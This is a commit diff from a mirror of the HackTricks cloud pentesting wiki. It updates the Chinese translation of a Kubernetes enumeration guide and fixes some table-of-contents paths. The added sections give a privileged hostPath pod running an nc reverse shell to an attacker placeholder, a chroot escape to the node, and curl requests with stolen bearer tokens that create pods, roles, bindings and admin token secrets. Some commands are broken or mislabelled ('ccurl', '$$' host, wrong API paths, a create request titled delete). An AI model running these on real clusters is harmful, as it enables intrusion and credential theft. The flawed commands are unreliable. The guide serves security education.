mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-02-05 11:26:11 -08:00
Translated ['src/pentesting-cloud/kubernetes-security/kubernetes-enumera
This commit is contained in:
Translator
@@ -451,8 +451,8 @@
|
||||
- [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md)
|
||||
- [Az - Function Apps Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md)
|
||||
- [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md)
|
||||
- [Az - MySQL](pentesting-cloud/azure-security/az-services/az-mysql-post-exploitation.md)
|
||||
- [Az - PostgreSQL](pentesting-cloud/azure-security/az-services/az-postgresql-post-exploitation.md)
|
||||
- [Az - MySQL](pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.md)
|
||||
- [Az - PostgreSQL](pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.md)
|
||||
- [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md)
|
||||
- [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md)
|
||||
- [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md)
|
||||
@@ -462,16 +462,16 @@
|
||||
- [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md)
|
||||
- [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md)
|
||||
- [Az - Automation Accounts Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.md)
|
||||
- [Az - Container Registry Privesc](pentesting-cloud/azure-security/az-services/az-container-registry-privesc.md)
|
||||
- [Az - Container Instances Privesc](pentesting-cloud/azure-security/az-services/az-container-instances-privesc.md)
|
||||
- [Az - CosmosDB Privesc](pentesting-cloud/azure-security/az-services/az-cosmosDB-privesc.md)
|
||||
- [Az - Container Registry Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md)
|
||||
- [Az - Container Instances Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-privesc.md)
|
||||
- [Az - CosmosDB Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.md)
|
||||
- [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md)
|
||||
- [Az - Conditional Access Policies & MFA Bypass](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md)
|
||||
- [Az - Dynamic Groups Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md)
|
||||
- [Az - Functions App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md)
|
||||
- [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md)
|
||||
- [Az - MySQL Privesc](pentesting-cloud/azure-security/az-services/az-mysql-privesc.md)
|
||||
- [Az - PostgreSQL Privesc](pentesting-cloud/azure-security/az-services/az-postgresql-privesc.md)
|
||||
- [Az - MySQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.md)
|
||||
- [Az - PostgreSQL Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.md)
|
||||
- [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md)
|
||||
- [Az - Service Bus Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md)
|
||||
- [Az - Static Web App Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md)
|
||||
|
||||
@@ -4,24 +4,24 @@
|
||||
|
||||
## Kubernetes Tokens
|
||||
|
||||
如果您已获得对机器的访问权限,用户可能可以访问某些 Kubernetes 平台。令牌通常位于 **env var `KUBECONFIG`** 指向的文件中或 **在 `~/.kube` 内**。
|
||||
如果您已经获得了对某台机器的访问权限,用户可能会访问某些Kubernetes平台。令牌通常位于**env var `KUBECONFIG`**指向的文件中或**在`~/.kube`内**。
|
||||
|
||||
在此文件夹中,您可能会找到包含 **连接到 API 服务器的令牌和配置的配置文件**。在此文件夹中,您还可以找到一个缓存文件夹,其中包含先前检索的信息。
|
||||
在此文件夹中,您可能会找到包含**连接到API服务器的令牌和配置的配置文件**。在此文件夹中,您还可以找到一个缓存文件夹,其中包含先前检索的信息。
|
||||
|
||||
如果您已在 Kubernetes 环境中攻陷了一个 pod,还有其他地方可以找到令牌和有关当前 K8 环境的信息:
|
||||
如果您已经在Kubernetes环境中攻陷了一个pod,还有其他地方可以找到令牌和当前K8环境的信息:
|
||||
|
||||
### Service Account Tokens
|
||||
|
||||
在继续之前,如果您不知道 Kubernetes 中的服务是什么,我建议您 **查看此链接并至少阅读有关 Kubernetes 架构的信息。**
|
||||
在继续之前,如果您不知道Kubernetes中的服务是什么,我建议您**查看此链接并至少阅读有关Kubernetes架构的信息。**
|
||||
|
||||
摘自 Kubernetes [documentation](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server):
|
||||
摘自Kubernetes [documentation](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server):
|
||||
|
||||
_“当您创建一个 pod 时,如果您没有指定服务帐户,它会自动分配到同一命名空间中的_ default _服务帐户。”_
|
||||
_“当您创建一个pod时,如果您没有指定服务帐户,它会自动分配同一命名空间中的_ default _服务帐户。”_
|
||||
|
||||
**ServiceAccount** 是由 Kubernetes 管理的对象,用于为在 pod 中运行的进程提供身份。\
|
||||
每个服务帐户都有一个与之相关的秘密,该秘密包含一个承载令牌。这是一个 JSON Web Token (JWT),用于在两个方之间安全地表示声明的方法。
|
||||
**ServiceAccount**是由Kubernetes管理的对象,用于为在pod中运行的进程提供身份。\
|
||||
每个服务帐户都有一个与之相关的秘密,该秘密包含一个承载令牌。这是一个JSON Web Token (JWT),用于在两个方之间安全地表示声明的方法。
|
||||
|
||||
通常 **一个** 目录:
|
||||
通常**一个**目录:
|
||||
|
||||
- `/run/secrets/kubernetes.io/serviceaccount`
|
||||
- `/var/run/secrets/kubernetes.io/serviceaccount`
|
||||
@@ -29,50 +29,41 @@ _“当您创建一个 pod 时,如果您没有指定服务帐户,它会自
|
||||
|
||||
包含以下文件:
|
||||
|
||||
- **ca.crt**: 它是检查 Kubernetes 通信的 CA 证书
|
||||
- **ca.crt**: 它是检查Kubernetes通信的ca证书
|
||||
- **namespace**: 它指示当前命名空间
|
||||
- **token**: 它包含当前 pod 的 **服务令牌**。
|
||||
- **token**: 它包含当前pod的**服务令牌**。
|
||||
|
||||
现在您有了令牌,可以在环境变量 **`KUBECONFIG`** 中找到 API 服务器。有关更多信息,请运行 `(env | set) | grep -i "kuber|kube`**`"`**
|
||||
现在您有了令牌,可以在环境变量**`KUBECONFIG`**中找到API服务器。有关更多信息,请运行`(env | set) | grep -i "kuber|kube`**`"`**
|
||||
|
||||
服务帐户令牌由位于文件 **sa.key** 中的密钥签名,并由 **sa.pub** 验证。
|
||||
服务帐户令牌由位于文件**sa.key**中的密钥签名,并由**sa.pub**验证。
|
||||
|
||||
在 **Kubernetes** 上的默认位置:
|
||||
在**Kubernetes**上的默认位置:
|
||||
|
||||
- /etc/kubernetes/pki
|
||||
|
||||
在 **Minikube** 上的默认位置:
|
||||
在**Minikube**上的默认位置:
|
||||
|
||||
- /var/lib/localkube/certs
|
||||
|
||||
### Hot Pods
|
||||
|
||||
_**Hot pods 是**_ 包含特权服务帐户令牌的 pods。特权服务帐户令牌是具有执行特权任务权限的令牌,例如列出秘密、创建 pods 等。
|
||||
_**Hot pods are**_ 包含特权服务帐户令牌的pod。特权服务帐户令牌是具有执行特权任务权限的令牌,例如列出秘密、创建pod等。
|
||||
|
||||
## RBAC
|
||||
|
||||
如果您不知道 **RBAC** 是什么,请 **阅读此部分**。
|
||||
如果您不知道什么是**RBAC**,**请阅读本节**。
|
||||
|
||||
## GUI Applications
|
||||
|
||||
- **k9s**: 一个从终端枚举 Kubernetes 集群的 GUI。查看 [https://k9scli.io/topics/commands/](https://k9scli.io/topics/commands/) 中的命令。输入 `:namespace` 并选择所有,然后在所有命名空间中搜索资源。
|
||||
- **k8slens**: 提供一些免费试用天数: [https://k8slens.dev/](https://k8slens.dev/)
|
||||
- **k9s**: 一个从终端枚举Kubernetes集群的GUI。查看[https://k9scli.io/topics/commands/](https://k9scli.io/topics/commands/)中的命令。输入`:namespace`并选择所有,然后在所有命名空间中搜索资源。
|
||||
- **k8slens**: 提供一些免费试用天数:[https://k8slens.dev/](https://k8slens.dev/)
|
||||
|
||||
## Enumeration CheatSheet
|
||||
|
||||
为了枚举 K8s 环境,您需要以下几项:
|
||||
为了枚举K8s环境,您需要以下几项:
|
||||
|
||||
- 一个 **有效的身份验证令牌**。在上一节中,我们看到了在哪里搜索用户令牌和服务帐户令牌。
|
||||
- **Kubernetes API 的地址**(_**https://host:port**_)。这通常可以在环境变量和/或 kube 配置文件中找到。
|
||||
- **可选**: **ca.crt 以验证 API 服务器**。这可以在与令牌相同的位置找到。这对于验证 API 服务器证书很有用,但使用 `--insecure-skip-tls-verify` 与 `kubectl` 或 `-k` 与 `curl` 时,您不需要这个。
|
||||
|
||||
有了这些细节,您可以 **枚举 Kubernetes**。如果 **API** 出于某种原因通过 **Internet** **可访问**,您可以直接下载该信息并从您的主机枚举该平台。
|
||||
|
||||
然而,通常 **API 服务器位于内部网络中**,因此您需要 **通过被攻陷的机器创建一个隧道** 以从您的机器访问它,或者您可以 **上传** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) 二进制文件,或使用 **`curl/wget/anything`** 对 API 服务器执行原始 HTTP 请求。
|
||||
|
||||
### Differences between `list` and `get` verbs
|
||||
|
||||
使用 **`get`** 权限,您可以访问特定资产的信息(_`describe` 选项在 `kubectl` 中_)API:
|
||||
- 一个**有效的身份验证令牌**。在上一节中,我们看到了在哪里搜索用户令牌和服务帐户令牌。
|
||||
- **Kubernetes API的
|
||||
```
|
||||
GET /apis/apps/v1/namespaces/{namespace}/deployments/{name}
|
||||
```
|
||||
@@ -150,7 +141,7 @@ kubectl config set-context --current --namespace=<namespace>
|
||||
{{#endtab }}
|
||||
{{#endtabs }}
|
||||
|
||||
如果你成功窃取了一些用户凭据,你可以使用类似的方式**在本地配置它们**:
|
||||
如果你成功窃取了一些用户的凭据,你可以使用类似的方式**在本地配置它们**:
|
||||
```bash
|
||||
kubectl config set-credentials USER_NAME \
|
||||
--auth-provider=oidc \
|
||||
@@ -328,7 +319,7 @@ kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/
|
||||
|
||||
### 获取服务
|
||||
|
||||
Kubernetes **服务**用于**在特定端口和 IP 上暴露服务**(这将充当实际提供服务的 pod 的负载均衡器)。 这对于了解可以找到其他服务以尝试攻击的地方很有趣。
|
||||
Kubernetes **服务**用于**在特定端口和 IP 上暴露服务**(这将作为负载均衡器,指向实际提供服务的 pods)。了解在哪里可以找到其他服务以尝试攻击是很有趣的。
|
||||
|
||||
{{#tabs }}
|
||||
{{#tab name="kubectl" }}
|
||||
@@ -365,7 +356,7 @@ kurl -v https://$APISERVER/api/v1/nodes/
|
||||
|
||||
### 获取 DaemonSets
|
||||
|
||||
**DaemonSets** 确保 **特定的 pod 在集群的所有节点上运行**(或在选定的节点上)。如果您删除 DaemonSet,受其管理的 pods 也将被删除。
|
||||
**DaeamonSets** 允许确保 **特定的 pod 在集群的所有节点上运行**(或在选定的节点上)。如果您删除 DaemonSet,受其管理的 pods 也将被删除。
|
||||
|
||||
{{#tabs }}
|
||||
{{#tab name="kubectl" }}
|
||||
@@ -383,7 +374,7 @@ kurl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets
|
||||
|
||||
### 获取 cronjob
|
||||
|
||||
Cron jobs 允许使用类似 crontab 的语法调度启动一个 pod 来执行某些操作。
|
||||
Cron jobs 允许使用类似 crontab 的语法调度启动一个将执行某些操作的 pod。
|
||||
|
||||
{{#tabs }}
|
||||
{{#tab name="kubectl" }}
|
||||
@@ -459,9 +450,13 @@ k top pod --all-namespaces
|
||||
{{#endtab }}
|
||||
{{#endtabs }}
|
||||
|
||||
## 在不使用 kubectl 的情况下与集群交互
|
||||
|
||||
由于 Kubernetes 控制平面暴露了 REST-ful API,您可以手动构造 HTTP 请求,并使用其他工具发送它们,例如 **curl** 或 **wget**。
|
||||
|
||||
### 从 pod 中逃逸
|
||||
|
||||
如果您能够创建新的 pod,您可能能够从中逃逸到节点。为此,您需要使用 yaml 文件创建一个新 pod,切换到创建的 pod,然后 chroot 进入节点的系统。您可以使用已经存在的 pod 作为 yaml 文件的参考,因为它们显示了现有的镜像和路径。
|
||||
如果您能够创建新的 pod,您可能能够从中逃逸到节点。为此,您需要使用 yaml 文件创建一个新 pod,切换到创建的 pod,然后 chroot 到节点的系统中。您可以使用已经存在的 pod 作为 yaml 文件的参考,因为它们显示了现有的镜像和路径。
|
||||
```bash
|
||||
kubectl get pod <name> [-n <namespace>] -o yaml
|
||||
```
|
||||
@@ -505,7 +500,7 @@ restartPolicy: Never
|
||||
```bash
|
||||
kubectl apply -f attacker.yaml [-n <namespace>]
|
||||
```
|
||||
现在您可以通过以下方式切换到创建的 pod
|
||||
现在您可以通过以下方式切换到创建的 pod:
|
||||
```bash
|
||||
kubectl exec -it attacker-pod [-n <namespace>] -- sh # attacker-pod is the name defined in the yaml file
|
||||
```
|
||||
@@ -513,8 +508,214 @@ kubectl exec -it attacker-pod [-n <namespace>] -- sh # attacker-pod is the name
|
||||
```bash
|
||||
chroot /root /bin/bash
|
||||
```
|
||||
从以下内容获取的信息:[Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
|
||||
信息来源:[Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/)
|
||||
|
||||
### 创建特权 Pod
|
||||
|
||||
相应的 yaml 文件如下:
|
||||
```yaml
|
||||
apiVersion: v1
|
||||
kind: Pod
|
||||
metadata:
|
||||
name: everything-allowed-exec-pod
|
||||
labels:
|
||||
app: pentest
|
||||
spec:
|
||||
hostNetwork: true
|
||||
hostPID: true
|
||||
hostIPC: true
|
||||
containers:
|
||||
- name: everything-allowed-pod
|
||||
image: alpine
|
||||
securityContext:
|
||||
privileged: true
|
||||
volumeMounts:
|
||||
- mountPath: /host
|
||||
name: noderoot
|
||||
command: [ "/bin/sh", "-c", "--" ]
|
||||
args: [ "nc <ATTACKER_IP> <ATTACKER_PORT> -e sh" ]
|
||||
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
|
||||
volumes:
|
||||
- name: noderoot
|
||||
hostPath:
|
||||
path: /
|
||||
```
|
||||
使用 curl 创建 pod:
|
||||
```bash
|
||||
CONTROL_PLANE_HOST=""
|
||||
TOKEN=""
|
||||
|
||||
curl --path-as-is -i -s -k -X $'POST' \
|
||||
-H "Host: $CONTROL_PLANE_HOST" \
|
||||
-H "Authorization: Bearer $TOKEN" \
|
||||
-H $'Accept: application/json' \
|
||||
-H $'Content-Type: application/json' \
|
||||
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
|
||||
-H $'Content-Length: 478' \
|
||||
-H $'Accept-Encoding: gzip, deflate, br' \
|
||||
--data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"labels\":{\"app\":\"pentest\"},\"name\":\"everything-allowed-exec-pod\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"args\":[\"nc <ATTACKER_IP> <ATTACKER_PORT> -e sh\"],\"command\":[\"/bin/sh\",\"-c\",\"--\"],\"image\":\"alpine\",\"name\":\"everything-allowed-pod\",\"securityContext\":{\"privileged\":true},\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"noderoot\"}]}],\"hostIPC\":true,\"hostNetwork\":true,\"hostPID\":true,\"volumes\":[{\"hostPath\":{\"path\":\"/\"},\"name\":\"noderoot\"}]}}\x0a' \
|
||||
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/default/pods?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
|
||||
```
|
||||
### 删除一个 pod
|
||||
|
||||
使用 curl 删除一个 pod:
|
||||
```bash
|
||||
CONTROL_PLANE_HOST=""
|
||||
TOKEN=""
|
||||
POD_NAME="everything-allowed-exec-pod"
|
||||
|
||||
curl --path-as-is -i -s -k -X $'DELETE' \
|
||||
-H "Host: $CONTROL_PLANE_HOST" \
|
||||
-H "Authorization: Bearer $TOKEN" \
|
||||
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
|
||||
-H $'Accept: application/json' \
|
||||
-H $'Content-Type: application/json' \
|
||||
-H $'Content-Length: 35' \
|
||||
-H $'Accept-Encoding: gzip, deflate, br' \
|
||||
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
|
||||
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/default/pods/$POD_NAME"
|
||||
```
|
||||
### 创建服务账户
|
||||
```bash
|
||||
CONTROL_PLANE_HOST=""
|
||||
TOKEN=""
|
||||
NAMESPACE="default"
|
||||
|
||||
|
||||
curl --path-as-is -i -s -k -X $'POST' \
|
||||
-H "Host: $CONTROL_PLANE_HOST" \
|
||||
-H "Authorization: Bearer $TOKEN" \
|
||||
-H $'Content-Type: application/json' \
|
||||
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
|
||||
-H $'Accept: application/json' \
|
||||
-H $'Content-Length: 109' \
|
||||
-H $'Accept-Encoding: gzip, deflate, br' \
|
||||
--data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"ServiceAccount\",\"metadata\":{\"name\":\"secrets-manager-sa-2\",\"namespace\":\"default\"}}\x0a' \
|
||||
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/serviceaccounts?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
|
||||
```
|
||||
### 删除服务账户
|
||||
```bash
|
||||
CONTROL_PLANE_HOST=""
|
||||
TOKEN=""
|
||||
SA_NAME=""
|
||||
NAMESPACE="default"
|
||||
|
||||
curl --path-as-is -i -s -k -X $'DELETE' \
|
||||
-H "Host: $CONTROL_PLANE_HOST" \
|
||||
-H "Authorization: Bearer $TOKEN" \
|
||||
-H $'Accept: application/json' \
|
||||
-H $'Content-Type: application/json' \
|
||||
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
|
||||
-H $'Content-Length: 35' -H $'Accept-Encoding: gzip, deflate, br' \
|
||||
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
|
||||
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/serviceaccounts/$SA_NAME"
|
||||
```
|
||||
### 创建角色
|
||||
```bash
|
||||
CONTROL_PLANE_HOST=""
|
||||
TOKEN=""
|
||||
NAMESPACE="default"
|
||||
|
||||
|
||||
curl --path-as-is -i -s -k -X $'POST' \
|
||||
-H "Host: $CONTROL_PLANE_HOST" \
|
||||
-H "Authorization: Bearer $TOKEN" \
|
||||
-H $'Content-Type: application/json' \
|
||||
-H $'Accept: application/json' \
|
||||
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
|
||||
-H $'Content-Length: 203' \
|
||||
-H $'Accept-Encoding: gzip, deflate, br' \
|
||||
--data-binary $'{\"apiVersion\":\"rbac.authorization.k8s.io/v1\",\"kind\":\"Role\",\"metadata\":{\"name\":\"secrets-manager-role\",\"namespace\":\"default\"},\"rules\":[{\"apiGroups\":[\"\"],\"resources\":[\"secrets\"],\"verbs\":[\"get\",\"create\"]}]}\x0a' \
|
||||
"https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/roles?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
|
||||
```
|
||||
### 删除角色
|
||||
```bash
|
||||
CONTROL_PLANE_HOST=""
|
||||
TOKEN=""
|
||||
NAMESPACE="default"
|
||||
ROLE_NAME=""
|
||||
|
||||
curl --path-as-is -i -s -k -X $'DELETE' \
|
||||
-H "Host: $CONTROL_PLANE_HOST" \
|
||||
-H "Authorization: Bearer $TOKEN" \
|
||||
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
|
||||
-H $'Accept: application/json' \
|
||||
-H $'Content-Type: application/json' \
|
||||
-H $'Content-Length: 35' \
|
||||
-H $'Accept-Encoding: gzip, deflate, br' \
|
||||
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
|
||||
"https://$$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/roles/$ROLE_NAME"
|
||||
```
|
||||
### 创建角色绑定
|
||||
```bash
|
||||
CONTROL_PLANE_HOST=""
|
||||
TOKEN=""
|
||||
NAMESPACE="default"
|
||||
|
||||
curl --path-as-is -i -s -k -X $'POST' \
|
||||
-H "Host: $CONTROL_PLANE_HOST" \
|
||||
-H "Authorization: Bearer $TOKEN" \
|
||||
-H $'Accept: application/json' \
|
||||
-H $'Content-Type: application/json' \
|
||||
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
|
||||
-H $'Content-Length: 816' \
|
||||
-H $'Accept-Encoding: gzip, deflate, br' \
|
||||
--data-binary $'{\"apiVersion\":\"rbac.authorization.k8s.io/v1\",\"kind\":\"RoleBinding\",\"metadata\":{\"name\":\"secrets-manager-role-binding\",\"namespace\":\"default\"},\"roleRef\":{\"apiGroup\":\"rbac.authorization.k8s.io\",\"kind\":\"Role\",\"name\":\"secrets-manager-role\"},\"subjects\":[{\"apiGroup\":\"\",\"kind\":\"ServiceAccount\",\"name\":\"secrets-manager-sa\",\"namespace\":\"default\"}]}\x0a' \
|
||||
"https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/$NAMESPACE/default/rolebindings?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
|
||||
```
|
||||
### 删除角色绑定
|
||||
```bash
|
||||
CONTROL_PLANE_HOST=""
|
||||
TOKEN=""
|
||||
NAMESPACE="default"
|
||||
ROLE_BINDING_NAME=""
|
||||
|
||||
curl --path-as-is -i -s -k -X $'DELETE' \
|
||||
-H "Host: $CONTROL_PLANE_HOST" \
|
||||
-H "Authorization: Bearer $TOKEN" \
|
||||
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
|
||||
-H $'Accept: application/json' \
|
||||
-H $'Content-Type: application/json' \
|
||||
-H $'Content-Length: 35' \
|
||||
-H $'Accept-Encoding: gzip, deflate, br' \
|
||||
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
|
||||
"https://$CONTROL_PLANE_HOST/apis/rbac.authorization.k8s.io/v1/namespaces/$NAMESPACE/rolebindings/$ROLE_BINDING_NAME"
|
||||
```
|
||||
### 删除一个秘密
|
||||
```bash
|
||||
CONTROL_PLANE_HOST=""
|
||||
TOKEN=""
|
||||
NAMESPACE="default"
|
||||
|
||||
curl --path-as-is -i -s -k -X $'POST' \
|
||||
-H "Host: $CONTROL_PLANE_HOST" \
|
||||
-H "Authorization: Bearer $TOKEN" \
|
||||
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
|
||||
-H $'Accept: application/json' \
|
||||
-H $'Content-Type: application/json' \
|
||||
-H $'Content-Length: 219' \
|
||||
-H $'Accept-Encoding: gzip, deflate, br' \
|
||||
--data-binary $'{\"apiVersion\":\"v1\",\"kind\":\"Secret\",\"metadata\":{\"annotations\":{\"kubernetes.io/service-account.name\":\"cluster-admin-sa\"},\"name\":\"stolen-admin-sa-token\",\"namespace\":\"default\"},\"type\":\"kubernetes.io/service-account-token\"}\x0a' \
|
||||
"https://$CONTROL_PLANE_HOST/api/v1/$NAMESPACE/default/secrets?fieldManager=kubectl-client-side-apply&fieldValidation=Strict"
|
||||
```
|
||||
### 删除一个秘密
|
||||
```bash
|
||||
CONTROL_PLANE_HOST=""
|
||||
TOKEN=""
|
||||
NAMESPACE="default"
|
||||
SECRET_NAME=""
|
||||
|
||||
ccurl --path-as-is -i -s -k -X $'DELETE' \
|
||||
-H "Host: $CONTROL_PLANE_HOST" \
|
||||
-H "Authorization: Bearer $TOKEN" \
|
||||
-H $'Content-Type: application/json' \
|
||||
-H $'Accept: application/json' \
|
||||
-H $'User-Agent: kubectl/v1.32.0 (linux/amd64) kubernetes/70d3cc9' \
|
||||
-H $'Content-Length: 35' \
|
||||
-H $'Accept-Encoding: gzip, deflate, br' \
|
||||
--data-binary $'{\"propagationPolicy\":\"Background\"}\x0a' \
|
||||
"https://$CONTROL_PLANE_HOST/api/v1/namespaces/$NAMESPACE/secrets/$SECRET_NAME"
|
||||
```
|
||||
## 参考
|
||||
|
||||
{{#ref}}
|
||||
|
||||
Reference in New Issue
Block a user